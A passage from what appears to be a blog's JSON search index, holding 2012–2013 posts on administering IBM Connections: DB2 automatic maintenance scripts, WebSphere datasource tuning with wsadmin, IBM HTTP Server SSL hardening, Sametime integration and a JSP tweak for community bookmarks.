sysproc.automaint_set_policyfile(\u0026#39;AUTO_BACKUP\u0026#39;,\u0026#39;DB2AutoBackupPolicy.xml\u0026#39;); call sysproc.automaint_set_policyfile(\u0026#39;AUTO_RUNSTATS\u0026#39;,\u0026#39;DB2AutoRunStatsPolicy.xml\u0026#39;); call sysproc.automaint_set_policyfile(\u0026#39;AUTO_REORG\u0026#39;,\u0026#39;DB2AutoReorgPolicy.xml\u0026#39;); call sysproc.automaint_set_policyfile(\u0026#39;MAINTENANCE_WINDOW\u0026#39;,\u0026#39;DB2AutoMaintenancePolicy.xml\u0026#39;); commit; You have to copy this for all databases where you want to configure automatic maintenance!\nAfter a full IBM Connections installation this are: blogs, cognos, dogear, files, forum, homepage, metrics, mobile, opnact, peopledb, sncomm, wikis.\nSo you have to copy the text block 10 times and change the “connect to” line.\nNow you can apply the settings with db2 -tvf setbackup.sql and you’re done. Restart db2admin or the database server after these settings.\nPrerequists Automatic maintenance needs a TOOLSDB! Without it the configured tasks will not start. When you forgot to enable TOOLSDB on the DB2 setup, you can create one with:\ndb2 create tools catalog cc create new database toolsdb You can check if a TOOLSDB is present and configured with: db2 get admin configuration\nLast lines should be:\n[...] Tools Catalog Database (TOOLSCAT_DB) = TOOLSDB Tools Catalog Database Instance (TOOLSCAT_INST) = db2inst1 Tools Catalog Database Schema (TOOLSCAT_SCHEMA) = CC [...] Example SQL File (for all Connections Databases) setbackup.sql ","excerpt":"\u003cp\u003eAfter skripting jdbc and j2ee on WebSphere i was interested to fasten\nthe DB2 configuration after a Connections installation.\u003c/p\u003e\n\u003cp\u003eThere are two ways to get valid source xml-Files for automatic\nmaintenance in DB2. I use automatic maintenance, because i can set a\nmaximum backup time and how many dumps of one database should be stored.\nDB2 deletes old backups (which i have in a filebackup each night)\nautomatically.\u003c/p\u003e\n\u003cp\u003eYou can’t script this settings directly,\n\u003ca href=\"http://pic.dhe.ibm.com/infocenter/db2luw/v9r7/index.jsp?topic=%2Fcom.ibm.db2.luw.sql.rtn.doc%2Fdoc%2Fr0052292.html\" target=\"_blank\"\u003eIBM\nprovides \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n two system calls for this: \u003ccode\u003esysproc.automaint_set_policyfile\u003c/code\u003e\nand \u003ccode\u003esysproc.automaint_set_policy\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eI use the file variant here, because i think it easier to handle files\nthan blob content.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-01-30-skripting-db2-automatic-maintenance/","title":"Skripting DB2 Automatic Maintenance"},{"body":"Setting the performance tuning parameters for all datasources in WebSphere Application Server (for IBM Connections 4 ) is a really annoying job with lots of mouse clicks.\nI searched a way to make these through wsadmin with a jython script and after some testing i wrote one, which set all parameters for the Connections DataSources as described in IBM Connections 4 Performance Tuning Guide .\nI set StatementCacheSize, minConnections and maxConnections with this script.\nDownload: changeDataSourceParameters Using this script Copy this script to your server and copy \u0026amp; paste it to a wsadmin-Session, or start wsadmin with\nwsadmin.(sh|bat) -lang jython -username youruser -password password -f path/changeDataSourceParameter.py I didn’t include error handling. When a DataSource is not configured, then the script will terminate!\nMore details Disclaimer I use this script in several installations without problem, but i’m not responsible, when you break your systems or loose data!\nIf you find errors, you can comment or send me a mail, but i will not provide support for this script.\n","excerpt":"\u003cp\u003eSetting the performance tuning parameters for all datasources in\n\u003ca href=\"http://www-01.ibm.com/software/webservers/appserv/was/\" target=\"_blank\"\u003eWebSphere\nApplication Server \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (for\n\u003ca href=\"http://www-01.ibm.com/software/lotus/products/connections/technical-cv4.html\" target=\"_blank\"\u003eIBM\nConnections 4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n) is a really annoying job with lots of mouse clicks.\u003c/p\u003e\n\u003cp\u003eI searched a way to make these through wsadmin with a jython script and\nafter some testing i wrote one, which set all parameters for the\nConnections DataSources as described in\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/IBM_Connections_4.0_Performance_Tuning_Guide\" target=\"_blank\"\u003eIBM\nConnections 4 Performance Tuning Guide \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI set StatementCacheSize, minConnections and maxConnections with this\nscript.\u003c/p\u003e\n\u003ch1 id=\"download\"\u003eDownload: \u003ca href=\"#download\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ca href=\"https://github.com/stoeps13/ibmcnx2/blob/master/ibmcnx/config/DataSources.py\" target=\"_blank\"\u003echangeDataSourceParameters \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"using-this-script\"\u003eUsing this script \u003ca href=\"#using-this-script\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eCopy this script to your server and copy \u0026amp; paste it to a\nwsadmin-Session, or start wsadmin with\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-01-10-setting-datasources-with-wsadmin/","title":"Setting dataSource/JDBC parameters with wsadmin"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/activity-stream/","title":"Activity Stream"},{"body":"With Connections Fixpack CR1 we had a problem, that profile pictures didn’t show up when we opened an activity stream entry:\nWith CR2 the profile pictures get not replaced with a grey head icon:\n","excerpt":"\u003cp\u003eWith Connections Fixpack CR1 we had a problem, that profile pictures\ndidn’t show up when we opened an activity stream entry:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/01/2013-01-04_20-52-32.png\" alt=\"2013 01 04 20 52 32\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eWith CR2 the profile pictures get not replaced with a grey head icon:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/01/2013-01-04_20-51-51.png\" alt=\"2013 01 04 20 51 51\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-01-04-connections-4-cr2-solves-picture-problem-on-homepage-activity-stream/","title":"Connections 4 CR2 solves picture problem on homepage / activity stream"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/homepage/","title":"Homepage"},{"body":"Last week i want to build a “light” Connections Installation to test some things like OAuth and Customizing. So i installed Domino 9 Beta on Ubuntu 12.04 64 Bit, DB2 9.5.7 Express and WebSphere. I deployed the homepage and the profiles databases. After this i want to install the required applications of Connections (Homepage, Search and News) and Profiles.\nInstallation shows no more dependencies and i started up my Connections after install. Modules are looking good, but when i want to add a status update the windows opens, but show no buttons to Save the Status. Even on homepage or people views i can’t add status updates.\nI had a look on a full installation and found “Files” addin in the Status Update Overlay. So i deployed filesDB and the application. Files was added to the overlay window, but still no buttons to save or cancel.\nIn Firebug i see that i get errors on some communities modules. So i deployed sncomm database and the communities application. After firing up Connections i can save Status Updates. It is enough to install Communities, the application mustn’t run! So i removed the autostart of communities and can use a lighter system, which runs on my notebook to test several things.\nRed parts in this screenshots come with Files, blue ones with Communities Application.\nI think IBM should document these dependencies in Connections Wiki or in the Installation Manager. I found no descriptions of dependencies in IM or the Wiki.\n","excerpt":"\u003cp\u003eLast week i want to build a “light” Connections Installation to test\nsome things like OAuth and Customizing. So i installed Domino 9 Beta on\nUbuntu 12.04 64 Bit, DB2 9.5.7 Express and WebSphere. I deployed the\nhomepage and the profiles databases. After this i want to install the\nrequired applications of Connections (Homepage, Search and News) and\nProfiles.\u003c/p\u003e\n\u003cp\u003eInstallation shows no more dependencies and i started up my Connections\nafter install. Modules are looking good, but when i want to add a status\nupdate the windows opens, but show no buttons to Save the Status. Even\non homepage or people views i can’t add status updates.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-12-30-dependencies-connections-4-applications/","title":"Dependencies Connections 4 Applications"},{"body":"I read an open APAR on IBM Connections today (login required!): LO73245 Description:\nTDI’s sync_all_users.sh doesn’t allow us to import departmentNumbers longer than 16 chars, although the database schema supports values up to 24 chars.\nAnd as local solution:\nworked around the issue with creating a custom field\nI had a very similar problem with validation of LDAP Search filter (which is saved in employee-table too) and searched longer to solve this (I set sync_store_source_url=false), but the real error was like here in validate_dbrepos_fields.properties.\nWhen you open validate_dbrepos_fields.properties (in your tdisol directory) you found following:\ndeptNumber=16\nSo here is the validation error and not in the database! You can solve the APAR without using a customField, when you set deptNumber to 24.\n","excerpt":"\u003cp\u003eI read an open APAR on IBM Connections today (login required!):\n\u003ca href=\"https://www-304.ibm.com/support/entdocview.wss?uid=swg1LO73245\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003eLO73245 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDescription:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eTDI’s sync_all_users.sh doesn’t allow us to import departmentNumbers\nlonger than 16 chars, although the database schema supports values up to\n24 chars.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eAnd as local solution:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eworked around the issue with creating a custom field\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eI had a very similar problem with validation of LDAP Search filter\n(which is saved in employee-table too) and searched longer to solve this\n(I set sync_store_source_url=false), but the real error was like here in\nvalidate_dbrepos_fields.properties.\u003c/p\u003e\n\u003cp\u003eWhen you open validate_dbrepos_fields.properties (in your tdisol\ndirectory) you found following:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003edeptNumber=16\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eSo here is the validation error and not in the database! You can solve\nthe APAR without using a customField, when you set deptNumber to 24.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-12-29-cnxlo73245/","title":"IBM Connections APAR LO73245"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tivoli-directory-integrator/","title":"Tivoli Directory Integrator"},{"body":"Klaus Bild provided two scripts for setting Connections Admins through jython and wsadmin.\nI want to add one detail, when you want to add multiple Admins, then you can use pipe | as delimiter.\nFirst line would be\nconnwasadmin='wasadmin|conadmin'\nThanks Klaus, i like to set the admins through a script, because fixpack installations often set the j2ee roles to default.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://kbild.ch/2012/11/add-admin-users-to-connections-4-security-roles-still-the-easy-way/?utm_source=feedburner\u0026amp;utm_medium=feed\u0026amp;utm_campaign=Feed%3A\u0026#43;kbild\u0026#43;%28kbild\u0026#43;-\u0026#43;Mehr\u0026#43;als\u0026#43;die\u0026#43;gelbe\u0026#43;Welt%29\" target=\"_blank\"\u003eKlaus\nBild provided two scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for setting Connections Admins through jython\nand wsadmin.\u003c/p\u003e\n\u003cp\u003eI want to add one detail, when you want to add multiple Admins, then you\ncan use pipe | as delimiter.\u003c/p\u003e\n\u003cp\u003eFirst line would be\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003econnwasadmin='wasadmin|conadmin'\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eThanks Klaus, i like to set the admins through a script, because fixpack\ninstallations often set the j2ee roles to default.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-11-09-klaus-bild-add-admin-users-to-connections-4-security-roles-the-easy-way/","title":"Klaus Bild – Add admin users to Connections 4 security roles – the easy way"},{"body":"Today Luis Benitez annouced the new Connections 4 Plugins for Lotus Notes .\nThe zip-file contains all three operating system installer. Windows, Linux and Mac, but i had no success to install through xpd.mac-addon.pgk, because the preinstall script stop the installation.\nYou can open this file in finder:\n]\n]\nNow you can copy the updatesite folder to an other place and use File – Application – Install in Lotus Notes. Point the Install to the updatesite folder and install the whole package. I have to restart twice, but after this i can use the new Status Update, Files and Activities Plugins.\n","excerpt":"\u003cp\u003eToday\n\u003ca href=\"http://www.lbenitez.com/2012/11/announcing-ibm-connections-40-plug-ins.html#disqus_thread\" target=\"_blank\"\u003eLuis\nBenitez annouced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the new\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=C1245802A721A20185257A9B005EFD52\" target=\"_blank\"\u003eConnections\n4 Plugins for Lotus Notes \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eThe zip-file contains all three operating system installer. Windows,\nLinux and Mac, but i had no success to install\nthrough xpd.mac-addon.pgk, because the preinstall script stop the\ninstallation.\u003c/p\u003e\n\u003cp\u003eYou can open this file in finder:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/11/2012-11-06_2135.png\" alt=\"image:image:/images/2012/11/2012-11-06_2135.png[image\" /\u003e\n\u003c/p\u003e\n\n]\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/11/2012-11-06_2137.png\" alt=\"image:image:/images/2012/11/2012-11-06_2137.png[image\" /\u003e\n\u003c/p\u003e\n\n]\u003c/p\u003e\n\u003cp\u003eNow you can copy the updatesite folder to an other place and use File –\nApplication – Install in Lotus Notes. Point the Install to the\nupdatesite folder and install the whole package. I have to restart\ntwice, but after this i can use the new Status Update, Files and\nActivities Plugins.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-11-06-install-ic4-lotus-notes-plugins-on-mac-os-x-10-8-x/","title":"Install IC4 Lotus Notes Plugins on Mac OS X 10.8.x"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/plugin/","title":"Plugin"},{"body":"Preamble Before i begin with my securing article, i want to say something on security on IBM Connections. Mainly i don’t like the thing, that IBM only support very special versions of software.\nSo we must use WebSphere 7.0.0.21, DB2 9.7.0.5, IHS 7.0.0.11 and so on. Each product had updates the last months and i think we won’t get support when we use other versions.\nSo i have to chances. On the first side i can update my software to limit vulnerabilities and get perhaps no support, or i will have vulerable software with support.\nJust my 2 cent and i hope i will get answer, if i will get support with higher program versions.\nSSL and IHS One of our customers had a pentest the last months and had some vulnerabilities with IBM HTTP Server (IHS), which is used to access IBM Connections.\nI used a 2048 Bit key for ssl which was generated with iKeyman, but the pentest doc told me, that short keys were used for encryption (smaller 112 bit). So i read a little bit.\nThis 2048 bit mean the public key of my hostkey. SSL uses this key to encrypt the connection between browser and webserver. Within the ssl handshake session keys are generated on basis of this hostkey. Browser and Server check which protocols are enabled on both sides and use one of the protocols both support.\nYou can check your SSL enabled server here: https://www.ssllabs.com/ssltest/index.html .\nInformation on ciphers with IHS: http://www-01.ibm.com/software/webservers/httpservers/doc/v10/ibm/9acdciph.htm You can limit the available ciphers and protocols on your IBM HTTP Server.\nFirst you should disable SSL v2: SSLProtocolDisable SSLv2\nI configure the directives in my virtual hosts section:\nListen 0.0.0.0:443 ServerName connections.example.com SSLEnable SSLProtocolDisable SSLv2 SSLCipherSpec 3A SSLCipherSpec 34 SSLCipherSpec 35 SSLCipherSpec 2F SSLCipherSpec 35b Poorly TLS v1.1 and v1.2 support comes with IHS 8 and we can’t use it with IHS 7.\nThis is my first article on securing IHS and Connections. Next part will continue with IHS, i want to disable some parts, which comes with the default httpd.conf and are not used with connections.\n","excerpt":"\u003ch1 id=\"preamble\"\u003ePreamble \u003ca href=\"#preamble\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eBefore i begin with my securing article, i want to say something on\nsecurity on IBM Connections. Mainly i don’t like the thing, that IBM\nonly support very special versions of software.\u003c/p\u003e\n\u003cp\u003eSo we must use WebSphere 7.0.0.21, DB2 9.7.0.5, IHS 7.0.0.11 and so on.\nEach product had updates the last months and i think we won’t get\nsupport when we use other versions.\u003c/p\u003e\n\u003cp\u003eSo i have to chances. On the first side i can update my software to\nlimit vulnerabilities and get perhaps no support, or i will have\nvulerable software with support.\u003c/p\u003e\n\u003cp\u003eJust my 2 cent and i hope i will get answer, if i will get support with\nhigher program versions.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-10-26-hardening-connections-part-1-ibm-http-server/","title":"Hardening Connections – Part 1: IBM HTTP Server"},{"body":"I had an issue with daily newsletters in Connections 3.x, where newsletters were sent every 25 and not 24 hours.\nThis is fixed in Connections 4, now newsletters are arriving every 24 hours.\n","excerpt":"\u003cp\u003eI had an issue with daily newsletters in Connections 3.x, where\nnewsletters were sent every 25 and not 24 hours.\u003c/p\u003e\n\u003cp\u003eThis is fixed in Connections 4, now newsletters are arriving every 24\nhours.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-10-25-daily-newsletter-in-ibm-connections-4/","title":"Daily Newsletter in IBM Connections 4"},{"body":"Today IBM released CR1 on IBM Fixcentral. CR1 is a set of 17 cumulative fixes and enable Mobile Admin (didn’t verified this, hope it will be there) too.\nLinks for all CR1 Downloads (Multi OS Fixes)\nFix list for IBM Connections 4.0 CR1 – Very long, seems to fix a lot\nIBM Connections 4.0 CR1 Post-install Deployment Configuration Steps\nUpdate strategy for IBM Connections 4.0\nCross-product relationship information\nYou have to download 18 packages, because a new update installer is mandatory!\n","excerpt":"\u003cp\u003eToday IBM released CR1 on IBM Fixcentral. CR1 is a set of 17 cumulative\nfixes and enable Mobile Admin (didn’t verified this, hope it will be\nthere) too.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eLinks for all CR1 Downloads (Multi OS Fixes)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix list for IBM Connections 4.0 CR1 – Very long, seems to fix a lot\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIBM Connections 4.0 CR1 Post-install Deployment Configuration Steps\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate strategy for IBM Connections 4.0\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eCross-product relationship information\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eYou have to download 18 packages, because a new update installer is\nmandatory!\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/10/2012-10-23_2141.png\" alt=\"2012 10 23 2141\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-10-23-ibm-releases-cr1-for-ibm-connections-4-0/","title":"IBM releases CR1 for IBM Connections 4.0 and enable Mobile Admin"},{"body":"Looks very interesting! Hope i get new stuff for configuring Lotus Traveler HA and IBM Connections. High Availability and Disaster Recovery Options for DB2 Linux, UNIX, and Windows ","excerpt":"\u003cp\u003eLooks very interesting! Hope i get new stuff for configuring Lotus\nTraveler HA and IBM Connections. \u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.redbooks.ibm.com/redpieces/abstracts/sg247363.html?Open\" target=\"_blank\"\u003eHigh Availability and Disaster Recovery Options for DB2 Linux, UNIX, and Windows \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-09-28-redbook-draft-high-availability-and-disaster-recovery-options-for-db2-linux-unix-and-windows/","title":"Redbook Draft: High Availability and Disaster Recovery Options for DB2 Linux, UNIX, and Windows"},{"body":"FP3 and IF1 for FP2 bring Mountain Lion Support (Mac OS X 10.8) to Lotus Notes.\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21599884\u0026myns=swglotus\u0026mynp=OCSSKTWP\u0026mync=R ","excerpt":"\u003cp\u003eFP3 and IF1 for FP2 bring Mountain Lion Support (Mac OS X 10.8) to Lotus\nNotes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21599884\u0026amp;myns=swglotus\u0026amp;mynp=OCSSKTWP\u0026amp;mync=R\" target=\"_blank\"\u003ehttp://www-01.ibm.com/support/docview.wss?uid=swg21599884\u0026myns=swglotus\u0026mynp=OCSSKTWP\u0026mync=R \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-09-28-lotus-notes-8-5-3-fp2-if1-offer-mountain-lion-support/","title":"Lotus Notes 8.5.3 FP2 IF1 offer Mountain Lion Support"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mac-os-x/","title":"Mac OS X"},{"body":"Partha’s Place == McGimp 2.8 (Native Mac Gimp 2.8)\nIntroducing the Mac version of Gimp 2.8. This is a native Mac version of Gimp that works just like any other Mac application.\nGreat app with tons of functions and now as a native Mac OS X App.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.partha.com/\" target=\"_blank\"\u003ePartha’s Place \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e== McGimp 2.8 (Native Mac Gimp 2.8)\u003c/p\u003e\n\u003cp\u003eIntroducing the Mac version of Gimp 2.8. This is a native Mac version of\nGimp that works just like any other Mac application.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eGreat app with tons of functions and now as a native Mac OS X App.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-26-mcgimp-2-8-gimp-2-8-as-a-native-mac-os-x-app/","title":"McGimp 2.8 – Gimp 2.8 as a native Mac OS X App"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-sametime/","title":"HCL Sametime"},{"body":"The last days i used to integrate Sametime in IBM Connections. I did this a few times the last two years, but i used ST 8.5.1 and older Connections Versions.\nFirst of all, it is much easier to apply now. You mustn’t add Proxy entries to your IHS (IBM HTTPServer) or activate awareness lookup in profiles-config.xml – BUT you have to install exactly the right versions.\nI mapped the wc_defaultport of Sametime Proxy to 80 and 443, so i mustn’t have special thoughts on firewalls. Now i checked out uiextensions-config.xml and added the URL of my Sametime Proxy Server. A good description can be found in Connections Wiki .\nWhen you only install IFR 1 for IBM Sametime 8.5.2 the integration is working only 30%! The chat window appears, but awareness lookup is missing. I traced a lot and get error messages like: “Script is still running: http://webchat . mydomain.com/stbaseapi/proxyLoader.js?ver=STSU8.5.2.120111105.1050:8557 do you want to stop this script.”\nOn this point i got a hint of KBild , because he had a other build number of Sametime Proxy 8.5.2 working. So i found Sametime Proxy Server 8.5.2 IFR 1 fix for IBM Connections 3.0.1.1 and IBM WebSphere Portal 7.0.0.2 support and mobile enhancements , which told me to download the fix OBEN-8SRQTP from IBM Fix Central .\nAfter applying this 870 MB fix everything is working fine. Awareness lookup and chat window appear.\n","excerpt":"\u003cp\u003eThe last days i used to integrate Sametime in IBM Connections. I did\nthis a few times the last two years, but i used ST 8.5.1 and older\nConnections Versions.\u003c/p\u003e\n\u003cp\u003eFirst of all, it is much easier to apply now. You mustn’t add Proxy\nentries to your IHS (IBM HTTPServer) or activate awareness lookup in\nprofiles-config.xml – BUT you have to install exactly the right\nversions.\u003c/p\u003e\n\u003cp\u003eI mapped the wc_defaultport of Sametime Proxy to 80 and 443, so i\nmustn’t have special thoughts on firewalls. Now i checked out\nuiextensions-config.xml and added the URL of my Sametime Proxy Server. A\ngood description can be found in\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/%20Adding_Sametime_awareness_through_the_Sametime_server_ic301\" target=\"_blank\"\u003eConnections\nWiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-16-integrate-sametime-proxy-8-5-2-ifr-1-in-ibm-connections-3-0-1-1/","title":"Integrate Sametime Proxy 8.5.2 IFR 1 in IBM Connections 3.0.1.1"},{"body":"Since version 3.0 bookmarks (dogear) module of Connections can be configured to open bookmarks in a new window, but the configuration does not include bookmarks in the Community module.\nTo get this function consistent and it would be good, when IBM adds the dogear configure switch to communities too.\nUntil this, you can follow this:\nGo to [AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/tags\nEdit displaybookmark.tag and change following line:\n\u0026lt;a id=\u0026#34;b_uri_${bookmark.uuid}\u0026#34; href=\u0026#34;\u0026lt;tango:safeURL\u0026gt;${bookmark.uri}\u0026#34;\u0026gt; to\n\u0026lt;div id=\u0026#34;b_entry_${bookmark.uuid}\u0026#34;\u0026gt; \u0026lt;h4\u0026gt; \u0026lt;a target=\u0026#34;_blank\u0026#34; id=\u0026#34;b_uri_${bookmark.uuid}\u0026#34; href=\u0026#34;\u0026lt;tango:safeURL\u0026gt;${bookmark.uri}\u0026gt; \u0026lt;/a\u0026gt; \u0026lt;/h4\u0026gt; \u0026lt;/div\u0026gt; To recompile the jsps and activate this changes, edit and save the bookmarks.jsp.\nWindows Edit and save following files:\n[AppServer-Root]\\profiles\\[Communities-WAS]\\installedApps\\[cellname]\\Communities.ear\\comm.web.war\\WEB-INF\\jsps\\html\\scenes\\dashboard\\sidebarRight.jsp\n[AppServer-Root]\\profiles\\[Communities-WAS]\\installedApps\\[cellname]\\Communities.ear\\comm.web.war\\WEB-INF\\jsps\\html\\scenes\\bookmarks.jsp\nLinux: touch these files:\n[AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/jsps/html/scenes/dashboard/sidebarRight.jsp\n[AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/jsps/html/scenes/bookmarks.jsp\nI haven’t found a way to change opening links in new window in the rightsidebar “Important Bookmarks” and in Bookmarks Widget of the Community Overview. I think these links are generated through Javascript and Feedreader.\n","excerpt":"\u003cp\u003eSince version 3.0 bookmarks (dogear) module of Connections can be\nconfigured to open bookmarks in a new window, but the configuration does\nnot include bookmarks in the Community module.\u003c/p\u003e\n\u003cp\u003eTo get this function consistent and it would be good, when IBM adds the\ndogear configure switch to communities too.\u003c/p\u003e\n\u003cp\u003eUntil this, you can follow this:\u003c/p\u003e\n\u003cp\u003eGo to\n\u003ccode\u003e[AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/tags\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eEdit displaybookmark.tag and change following line:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;a \u003cspan style=\"color:#268bd2\"\u003eid\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;b_uri_\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uuid\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u0026lt;tango:safeURL\u0026gt;\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uri\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eto\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;div \u003cspan style=\"color:#268bd2\"\u003eid\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;b_entry_\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uuid\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;h4\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003etarget\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;_blank\u0026#34;\u003c/span\u003e \u003cspan 